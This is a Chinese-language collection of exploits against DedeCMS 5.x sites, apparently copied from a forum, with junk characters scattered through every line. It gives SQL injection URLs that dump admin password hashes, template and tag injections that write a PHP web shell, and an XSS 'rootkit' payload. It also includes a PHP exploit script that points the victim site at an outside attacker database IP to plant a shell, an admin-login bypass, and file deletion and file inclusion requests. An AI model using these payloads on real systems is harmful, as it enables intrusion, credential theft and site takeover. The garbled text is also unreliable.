|
|
f6 v: @1 V/ A! m# A& T; B
Dedecms 5.6 rss注入漏洞( `. [/ J( ?0 }; k
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1: O; ^$ X, z9 i7 c5 B) p2 B
/ \) O6 h$ t& _7 U4 _" Q; f
( |' ^: X3 U& ~ O' x. A) ?+ b
' t) Q4 X! J1 w! v% a0 i5 D$ e6 A0 t
- N2 t2 w. m$ o0 e5 j! E6 t# U8 t2 x' m& n4 u9 J- J6 @7 \
9 C2 |, t. K3 c5 J/ ?
# Z( v3 M- Q6 z( F2 |& JDedeCms v5.6 嵌入恶意代码执行漏洞
* u( _9 X T X+ e0 K$ r' j1 _注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}( V" R8 k6 _6 q* x9 X( t
发表后查看或修改即可执行
5 `& D( a1 j' W% Ua{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
1 k: M3 X8 w2 H" H/ U生成x.php 密码xiao,直接生成一句话。
0 X& _% B2 w T; s0 {, ~4 ^" M7 @4 u& r
) C$ F% z9 F7 ^ L& X' O" M
7 t! t& p7 H2 o
7 C# d4 L) S& _, F& B& ?3 Q* A7 f' }5 f# e$ }
' T% }& W4 I4 d6 P, z; V8 E
. z/ D! i; o5 m$ B- ?4 O9 o" l: H/ S
Dede 5.6 GBK SQL注入漏洞& c: e9 W4 v* J* h* S5 K
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
$ f) V( `0 _- r2 Q2 T6 Lhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
: k3 R7 O. ^5 p: P6 Thttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
1 _7 w2 [1 O& I- }/ e; w9 {* d4 ^ H1 H, ^- h; O, t
J$ g# y/ N8 T; D/ b; Q' g0 M9 f# N. ?
$ e7 X0 z. a# m: d& @" \3 e7 O6 J
# e Z' B% U! {- _" Z! ]
& u0 _% W' F9 l/ y6 {, s2 F
9 A [8 a8 v" j4 r5 N, |
8 _+ Y4 D4 Q8 Q4 A$ gDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! O; W& ?8 a( m4 i5 \5 b# t6 Yhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, f1 b/ [9 N' W9 ]( k! ~4 e2 _; B( L2 L4 z$ m* E/ W$ w$ m
, q7 @* T* ]6 ?/ U# s! O8 [
1 R8 S" e( Y6 l6 `. e" c; e2 i4 J$ O/ u
) b5 Z( {" ^6 a2 r$ i
! y5 ^7 s" t6 U- z) {+ W) @8 ^DEDECMS 全版本 gotopage变量XSS漏洞
% k( A! u p0 Y, z0 Q+ d1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 7 A" P7 [2 c9 F L1 j9 K
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2 p" t1 u' N R
( k) @- S9 ?/ ?" ]' D# Y3 r. J) x- O. [$ k) l/ ?
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
1 Z. d# `( E) Z' P1 P0 I& Whttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
. Q3 R- h- _3 a, R4 B
I' Z6 P9 l( `+ Z/ B# P( E2 i/ w k5 R/ m1 e' M1 m. j
http://v57.demo.dedecms.com/dede/login.php+ S9 |% S( D/ y0 A
g$ V# d( ]& N1 R
9 m6 ^! r, F* b# g! Jcolor=Red]DeDeCMS(织梦)变量覆盖getshell) ?) c5 G% z% p4 l( ?0 X- s3 R
#!usr/bin/php -w/ L7 }) ]$ G; I M/ O8 ?+ |
<?php( B$ S" k( `- S% H r- @
error_reporting(E_ERROR);
% S$ \, }2 ?7 Q$ E1 dset_time_limit(0);
) _0 D/ `( z& J2 r @8 Mprint_r('4 J. t7 n1 V6 x2 f
DEDEcms Variable Coverage! I; s! c( v0 ~7 n' v# I
Exploit Author: www.heixiaozi.comwww.webvul.com5 w: V- v G q- d& w% `
);
3 J( p0 b D- e8 O% B: iecho "\r\n";: I* P5 r/ H0 {* k2 u1 X
if($argv[2]==null){+ r2 X9 {- E/ e
print_r('* h; Y! X# P' g' T$ M ?
+---------------------------------------------------------------------------++ B+ m- j8 a( V: W
Usage: php '.$argv[0].' url aid path. w @# r. V% ~
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/. K. h# M: f& k$ @* @
Example:
0 h4 F6 T% E; s+ T# qphp '.$argv[0].' www.site.com 1 old
5 D0 ^0 l V; U8 ?7 z6 I" a+---------------------------------------------------------------------------+
l5 X' K$ |' m');
: M# j/ I, G& Q( C. s8 P! ?exit;' N- Q1 T0 T9 O& m: K* b1 Y
}
' ?5 T4 U) k/ M* S' n c& t# W$url=$argv[1];9 h4 f2 K( I ^+ W+ S
$aid=$argv[2];
4 M. b# i* j* j" o! \, t$path=$argv[3];2 s# D( B3 ~* L) Y8 D/ c/ [2 h
$exp=Getshell($url,$aid,$path);
) r9 o! [) d N$ h6 z5 f( oif (strpos($exp,"OK")>12){, Z* `8 R6 M5 q4 R
echo "
7 p. `! ~& s0 S) E/ wExploit Success \n";
; i u: i" q$ tif($aid==1)echo "
1 H6 o7 H! X/ m& Y, _( [# ?2 F; _Shell:".$url."/$path/data/cache/fuck.php\n" ;% R' B. ]/ {' n* J8 w
' n/ _: A* r& i
. b4 P' h& p) k' lif($aid==2)echo "- ?% r: {) K( i+ M3 v( _. f; M
Shell:".$url."/$path/fuck.php\n" ;9 D& J. g8 F5 c% G H! C3 I
: ~0 m; P* k1 m
2 d8 X9 O: j0 g/ |if($aid==3)echo "
. d4 S5 g l k0 m7 VShell:".$url."/$path/plus/fuck.php\n";
6 \- ]# j5 _. r: V8 U% d j5 w/ L. Q* V, L, v; V, W: g" [
* H5 n4 h& D9 _& Q5 Z( C}else{0 J* W; G c s7 q9 w* h
echo ": x5 m$ D e! z& H. \/ }
Exploit Failed \n";
6 E% @1 ?" e+ u) L: c, h7 N0 N}
- W; {* {4 z, I7 afunction Getshell($url,$aid,$path){
5 T `6 h4 ]5 p+ B3 m' f$id=$aid;3 U9 c) F7 ?, S
$host=$url;; p. y+ \$ ^8 V3 u7 a. K
$port="80"; g$ v9 n! w; F9 d
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
1 T! r# c6 M3 A; R# r! B# x$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";- \* S) z0 s1 s+ O0 A
$data .= "Host: ".$host."\r\n";
3 {/ `( {$ g5 b8 j7 n+ o( y' k$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";# s) C- |$ _3 ?+ G
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";3 A( U2 k7 ]$ Z0 i8 u
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";" u+ N1 C% |2 H1 M. T
//$data .= "Accept-Encoding: gzip,deflate\r\n";
. I" L# U; U6 M7 e3 K$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";4 R4 G6 O6 S' v! y
$data .= "Connection: keep-alive\r\n";+ V* E5 ^! C4 u& _( _/ t
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";% q: D4 i$ Q/ Q1 q% c& H( ?
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
4 e+ r' n1 g' A" @/ @$data .= $content."\r\n";
6 n9 ]+ f$ ^2 n# q, o$ock=fsockopen($host,$port);
9 r7 B% j# N, I% w1 Xif (!$ock) {
) Z2 ?$ N- O9 R( ~" s# q- _echo "
V/ e: { X/ d- q* L# B( bNo response from ".$host."\n";
+ M7 q h8 O( x7 [/ u}3 z5 P+ x6 c: C7 a% V( C
fwrite($ock,$data);
5 d- b' x/ n# ?& ^( M, Gwhile (!feof($ock)) {/ J3 }" K$ b" d9 ~* D% y
$exp=fgets($ock, 1024);
9 \5 B$ I' \+ Zreturn $exp;
9 e7 u1 Y1 _# R' a& L3 g% Z, y}3 K8 L* Y# T4 e: S8 m6 a
}
# V6 z2 Y; b" ?2 T+ Q+ H* D. ~ v U3 U$ X
% ]" p8 d& R! T
?>
+ z- y! ^( Y$ F4 r) O
$ H' R. M9 g, B( ^: l3 A4 h
& z4 R3 ?8 P& R( l8 m
2 V t3 i! h0 p9 c- N& A, Y4 \, X7 l: X
) j. B0 B: P9 H h. d. I* t4 S# p! b S8 E5 u' A' ~3 K$ U
0 Z- ]! ?2 A1 B. y" m& S! ?5 _0 o' {
! k- n/ C8 p% Q2 x9 f N3 ^+ W* {6 ?
- w( R' o9 P. p& c7 [/ eDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 T- m( W" h& r8 f# ~
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root- A: Y2 X: F3 B- S
! T9 x n* c; B- r
; l1 L7 n8 p: z; N$ ?把上面validate=dcug改为当前的验证码,即可直接进入网站后台9 s6 |2 I: R- Z
* S. f4 V% x, l$ h! Z/ Q" o7 o7 P% e ^$ K, d
此漏洞的前提是必须得到后台路径才能实现$ ]0 r/ b% B1 a! O7 ^1 l
7 H# J8 L# f$ \) Q
& `8 u5 `+ i8 g, i) I, n! P1 l. l
3 @9 V8 v% [' W+ v* D5 [0 w& {: r2 ~2 ~/ w/ r: C! z8 ]6 i
0 e$ `. S0 ?" W2 v/ `% V
* ?4 v0 f9 z; |5 r" v- y
6 a) n$ M$ A5 ~; u5 O4 \+ f- R, ?* U7 h/ d5 `5 I
- p! `# s2 j$ u* @Dedecms织梦 标签远程文件写入漏洞9 V& i3 w9 v# R0 m- n
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');5 r8 Y& f# E% }5 s3 L# ^/ y
8 t+ }& v6 e& L1 e: \* q' I+ j* r" x; v0 e" [
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
% k3 y! `9 p! S. }8 S<form action="" method="post" name="QuickSearch" id="QuickSearch">
! d( J2 H) u8 v5 L' U8 Q<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' \0 q% J) m2 {1 h0 F" P5 h: a7 ~- Y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />+ R4 h- D- t( j; N2 ]: b! }
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, E" C5 e7 u9 _; |% t+ D5 E9 Q<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
/ ^1 N1 B4 }! d v, `+ N, X' F8 p<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# Z |3 W# ^5 L2 W2 @3 F' K<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
3 P; d1 G: \% ^5 x<input type="text" value="true" name="nocache" style="width:400">
/ o( L/ l6 |, u' {. ~+ X. b+ _7 \<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 v: {" G/ h7 Z1 d</form>
: d/ |, t4 [, {/ C% g<script>
3 y" {7 Y$ v; y. N l# Cfunction addaction()
. C E5 }5 `6 _{
% T! {; ^' y' F/ Y. W( I, hdocument.QuickSearch.action=document.QuickSearch.doaction.value;
6 u/ l8 n3 m6 O+ a, h2 x7 A' t, W}
7 p* C$ E" L7 N+ `5 u</script>$ Q: f {) Q$ ]9 _
2 t* |/ `- c8 f" I1 K3 P! W( I
7 g) W; ]0 ]: V) e! S& n" y" W* L
6 `( r3 I# q" J0 j6 E F8 i9 o( i
) T- p) D; p- @. d9 H- a2 _
; o# n6 W' Q |, d I$ j) K" J- C. u) R4 V' `
3 p9 \# i7 w2 E' L6 C) k, Y/ T
" V5 G& r6 V/ O' [' a" `
4 m# R- P V, \+ k5 K
; C& R9 ~" ^, [* M( M' ]3 ^
DedeCms v5.6 嵌入恶意代码执行漏洞" p( _& ]* k. d3 v+ n* e
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
+ [ C0 O! l. h2 ^* O# c! f4 x6 Ea{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
8 F8 y: |: j& u& k. s8 L. X生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得$ v- T! ^8 X a% d: j
Dedecms <= V5.6 Final模板执行漏洞
0 o; r7 Z- l+ \2 G5 t0 R注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:/ H* A1 H2 ^% V
uploads/userup/2/12OMX04-15A.jpg
2 A) R3 ?9 E; X0 m& T0 {2 x
1 `" F& l1 W& i! D) g( S0 L1 u' B8 G* J$ m0 F& ^
模板内容是(如果限制图片格式,加gif89a):- X. y4 t: c" V$ z
{dede:name runphp='yes'}
1 `& \ ~- y# [- y, c s2 O3 k" C8 L$fp = @fopen("1.php", 'a');
. l( u- c1 {3 H4 W2 Q: N@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");. z% ]% o# {" q! ]5 c9 _5 y6 x
@fclose($fp);8 I! J, p2 x& E# ?. _9 b
{/dede:name}0 d: J) L+ h) _* l, {7 R1 x: L
2 修改刚刚发表的文章,查看源文件,构造一个表单:8 e! X; C! J4 K
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">. W& ?" \1 \, D. ]6 R
<input type="hidden" name="dopost" value="save" />* L8 V, e& Y" U7 C1 \: Z' Y
<input type="hidden" name="aid" value="2" />7 M; L1 k0 q$ z$ ]
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
8 d/ x! L0 `. q$ P' \<input type="hidden" name="channelid" value="1" />
- b0 X7 k2 l' @7 O: V" g<input type="hidden" name="oldlitpic" value="" />
& \' C6 Y2 A+ b9 U* y: F<input type="hidden" name="sortrank" value="1275972263" />! u( E3 [+ N: z
& O$ C5 K. z. n& y1 K9 L2 c+ N: h6 l
<div id="mainCp">. c) M' s# t: [8 Y, Q' A3 m
<h3 class="meTitle"><strong>修改文章</strong></h3>7 z+ m# f) [0 z+ U
j0 `8 O5 y0 Z4 H
# g2 F$ `1 y% E! l5 G$ J% [/ Z& _# d<div class="postForm">3 g4 e$ V% B, v# w2 B, h2 {
<label>标题:</label>
0 U: _0 c9 u$ m9 @8 O* S9 c* T<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>0 h- K( ~# ^9 b+ o6 l7 a4 B
' L( F4 s- T9 e* `8 ?
6 Q8 b' J$ w- B; |0 x: D6 `6 q- [
<label>标签TAG:</label>
6 J8 |: q$ K+ @6 ]/ Q/ W<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ p5 i4 e8 d0 @! }' w# a/ v
1 o6 G5 J& y# a. N
7 g- T7 R9 h9 Y- {1 D$ }
<label>作者:</label>
5 Y/ O- M- O" Q* y# p1 i( ?<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>! s3 r% A' G% V4 e
0 \' g4 s( R. M: {# C& n7 F
$ U* G8 n" z" f! j& u
<label>隶属栏目:</label>
5 D5 R4 |, W/ y1 o" r! t<select name='typeid' size='1'>0 w( L5 q1 R" p: f5 h; _; e4 B3 p6 w
<option value='1' class='option3' selected=''>测试栏目</option>
8 V$ d" z4 T& V( N l</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
8 S$ O6 w% F- P- m1 l1 @( |6 H3 A: H
7 k( a7 b( G+ _5 F4 F1 s' y6 Q7 u, ?- L, T. h0 R
<label>我的分类:</label>9 ~. J1 ^: s/ B# e( G
<select name='mtypesid' size='1'>8 t% q2 ]) k+ y+ ?) b2 v* j
<option value='0' selected>请选择分类...</option>& u" o, @' p. ?9 [ n
<option value='1' class='option3' selected>hahahha</option>+ s$ T# ~. y" \) g
</select>
& H4 s. Q; J3 M1 {. e- [
" F% c4 d; d* x7 {
' B" w3 h0 n9 x$ `" g<label>信息摘要:</label>1 I* n8 _0 Y. o7 O% L) Z4 `+ _
<textarea name="description" id="description">1111111</textarea>
) ^$ ]5 e$ T! c4 S4 k(内容的简要说明)+ M/ q8 L: N2 A% \8 k
F3 s9 d, Y3 x7 a9 B) K7 | Q1 {% w0 {; p3 c6 N" ?9 V8 }
<label>缩略图:</label>
# Y: ^+ p) f; [* t<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
. K( ~* {' p7 D7 q' O0 e3 f* d# {; v8 X' I( b9 a. }
$ t0 M# p+ J: Q; i<input type='text' name='templet'2 O& J; D- `" l6 l: W
value="../ uploads/userup/2/12OMX04-15A.jpg"> k( j$ J$ g& D0 `. O
<input type='text' name='dede_addonfields'
' e3 D$ E3 ~' x/ l% [* pvalue="templet,htmltext;">(这里构造)2 n1 X- Q5 k4 q
</div>* P& n. Y2 k! W. z* a5 G$ R
+ g2 N2 h, ~( G! a* `3 w8 k. t# y$ W+ y o' Z; I A! t4 x% v
<!-- 表单操作区域 -->
/ D4 m$ K) F+ `0 i( ~- Y<h3 class="meTitle">详细内容</h3>
) [5 J; u2 B& W
& o( [. |5 u8 f D& h
! Y. _- |4 T* M! ]% d* v<div class="contentShow postForm"># ?0 r' N1 g2 B3 o; U4 z
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
! Y; C$ U( d* y4 A
7 E: Q. m w$ E' u- n' I( W, U1 e8 x+ `: D
<label>验证码:</label>) B0 |7 i' b n4 \0 {& ?, Y
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />5 _9 g+ c, E$ d$ L% s
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
+ C1 @- C' V. ?" S; @
6 E G5 N# P* G: F5 K' E+ r. ]0 u
<button class="button2" type="submit">提交</button>' i+ E0 Q! A0 k8 B& ~5 p R
<button class="button2 ml10" type="reset">重置</button>2 z( F9 _/ {# Z1 p; C% R6 [
</div>. A) t/ e+ T' V1 c/ i, b) L
9 _) V4 N! Q8 w6 C1 A
. P5 @/ G. o/ u8 O" S: }</div>
9 q( F& i0 a) c {6 r2 k, V
" W, J3 P7 e0 ?4 m& K! V5 n
3 ]5 K' K5 J8 n</form>. Z, Y2 b- {! x. _7 Q+ @: k+ \
; e$ F3 n5 Y( w* E/ a
* ~9 h7 f6 `0 r9 C5 [- A2 J; w8 M提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:. w: b' B0 W# i
假设刚刚修改的文章的aid为2,则我们只需要访问:
2 O5 |1 R: Z8 Z4 x" R% t6 phttp://127.0.0.1/dede/plus/view.php?aid=2
d/ Z! G+ r; L0 ^8 W/ J* o6 S8 I& t即可以在plus目录下生成webshell:1.php- _& |7 z8 Y8 n L7 M
, g3 M+ T2 U3 j. C5 k6 q1 y
7 v/ Q y0 J2 ?7 o/ U
/ S+ t# b1 b J& K/ m% n, N0 ^- Y5 R; ~' j; f3 \; f2 P) h) _, S- u
h/ s! v! g4 U7 b8 ?
! v- f5 i( u- b" H7 p+ K1 x" R' R5 z: @* e- n$ o! z. a) l+ h
+ Z% D* p( z- D/ _: i
+ K. P' f* w+ Y0 V" ~3 `$ S; T: V( A4 j! Q4 ~9 U; U
% V# j9 R8 Z% v
( O L/ w7 a* q" F7 ]- dDEDECMS网站管理系统Get Shell漏洞(5.3/5.6) Y" H: O; a0 n5 I
Gif89a{dede:field name='toby57' runphp='yes'}
d0 r; Q, ^' _9 E; I# ?" w$ _; Yphpinfo();
& b3 f: b2 \) t{/dede:field}5 j% \7 p* m- e% Z" h
保存为1.gif
( |$ G4 E" X8 U1 t1 C. v<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 4 ~0 U$ y+ M, w) |3 N& T
<input type="hidden" name="aid" value="7" /> 6 {2 o D2 u* L
<input type="hidden" name="mediatype" value="1" /> * | B- x: D. U$ |, a* Y
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
/ r7 {$ c7 Y$ I- @ t$ A, Q' j' e<input type="hidden" name="dopost" value="save" /> 5 ~! ^7 c4 [1 x5 D( y9 r; ~
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 8 z4 [# y$ m: p* H% g, \7 n
<input name="addonfile" type="file" id="addonfile"/> " n/ z: I5 T6 `# c( @, z! n
<button class="button2" type="submit" >更改</button> " m6 O, U9 w* ^4 b: w
</form> . Y! j; x7 q: J4 j( Z
% S+ W. p6 [1 f5 y* l& t/ d3 W
$ t0 V8 w/ k9 }构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
8 a4 A) ]. b9 R$ ]发表文章,然后构造修改表单如下: l3 D4 L3 |) o+ s5 X) s
4 ]+ S: l" n$ B0 O$ W) |+ B! ]
% R6 g( Y( ^! W( Z1 n<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 3 n/ `, e" Y( @& m8 d7 \
<input type="hidden" name="dopost" value="save" />
% }; F" b0 Z3 I* K<input type="hidden" name="aid" value="2" />
' S* O2 D5 ?7 a$ @<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
% d4 [6 R( S3 n( O<input type="hidden" name="channelid" value="1" />
4 e% N& J4 U7 E; j2 O<input type="hidden" name="oldlitpic" value="" /> ( E/ v1 g' q a; i3 p" p
<input type="hidden" name="sortrank" value="1282049150" /> , ^/ r7 x4 m7 u' k
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 B" C- a( z- Y. T3 |; R, h5 _& r
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 6 T9 Q1 i% ^7 K8 J. T
<select name='typeid' size='1'> / M9 C# o3 q! y) E% P
<option value='1' class='option3' selected=''>Test</option>
, `0 P3 _, G: W7 y; d4 X @: F<select name='mtypesid' size='1'> 6 H Q! s; Z+ F% y
<option value='0' selected>请选择分类...</option>
' c# e' }2 `. u( r* }<option value='1' class='option3' selected>aa</option></select> + j2 ^( D" A9 n2 {2 O- T# Q
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ( x4 _& C9 v: @( F/ z& @
<input type='hidden' name='dede_addonfields' value="templet">
4 d* d& u5 ~) G% G& W3 d* t; P$ A<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 3 p; I) z# c! R' j/ n% a
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
1 [0 [6 x6 q. y4 d8 {; g<button class="button2" type="submit">提交</button>
* e) Y$ Y: B( u; i5 `6 x+ H</form>- k, ^/ ]8 Z$ b2 N' i p8 j W
W# K/ O. B7 z% q2 k% w
5 g5 Y+ X1 u1 w+ ]/ ^9 \$ m
4 ]0 k! a. I5 S
) L: R& j3 a2 T5 b( C0 Y
* \9 {$ A1 J0 d7 J0 ~
# n2 O5 a: C0 m- v: X3 m2 O, h" {, `) t% } c( Y
$ c6 e, W- M8 T" D! u/ L2 z D9 D6 Q4 C9 \" d2 ^
: ~0 U7 u4 F( Q) s
* {9 O) s. s9 |3 [! Q
: x, N5 k& H# V! k+ m: n4 z
织梦(Dedecms)V5.6 远程文件删除漏洞
0 q* f3 `$ a X7 D7 Whttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 A S% m* @' Y. B. C5 F. j# J/ S, c7 v+ N
5 x; w4 `0 M. `) {, U1 i- t. o, z* Q
& e- C( I! j5 d5 k
- ^* `& p- b* }" N# y/ Q
8 Y$ X1 {$ m% C8 c+ f. N' o7 p. X. D; C
5 H/ a2 x* I# S: M ?
& ^/ Y! b: \3 W# H1 T- n* M
8 ~* Y$ y4 @1 I6 P8 |! L3 T& g1 A. c9 ~ C" p. l& X" u) k
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
5 n& y* Z- t! E) H- \6 E$ |http://www.test.com/plus/carbuya ... urn&code=../../4 [1 m0 u/ [+ z- a8 c+ l3 P5 f, C6 ]1 F
0 x' ?2 P- w2 e
. U8 A- z8 W/ G8 l u$ j* v, h
1 E) m2 p% d1 C2 e) P8 C3 ?8 w3 c* W7 E3 q: r- D4 B
2 H' O) v. V8 j0 @+ U& Y+ Z8 L
5 Z& Q/ i( a1 L- ^( d
6 b/ D. |$ V- @; N2 ]2 Y, ?
; z( N+ Z, V$ X9 p& W
: T* P+ e8 Z# Q- E! v% E, T+ |
: e1 E. B! \" _" j1 _1 [9 \DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' T1 ]! C' t8 ~6 Z5 ]plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
! I V* O5 j: U密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5# E# m7 q2 S4 U @1 {/ K
, }3 T) F( a' u2 L) o/ L$ ]. L( j' P4 e2 b8 {* s/ j
$ X' k" j1 {2 }+ ?- [ X1 h' z W0 U5 N! i1 M7 y& H
7 I! ]; n; C. Q" {' d3 R- n9 Q+ b
" ^6 ?6 ~ a v' \6 x( L; V2 x7 M& g! g7 X) A, H
! T- L/ g, c; O, h0 [% N. M
: d' S6 N# A4 T" A织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
( O9 k' i8 P: F* H/ X& }http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='; w7 q5 G; U/ j2 F! ^* ~6 D
6 e! E ^8 A, e6 C
: Q2 x0 a/ w3 g; r+ U! o! g; z Z5 `- R& u
4 B- X# s* w; U- T3 J& h. Q) d0 x/ V6 Y4 M
$ z1 N5 E9 O3 E6 v% D, U
, P$ @3 D7 ?5 n% c* J
2 e1 n" Z, O3 l! g; p0 \ M% r. R% O7 o5 y6 Q
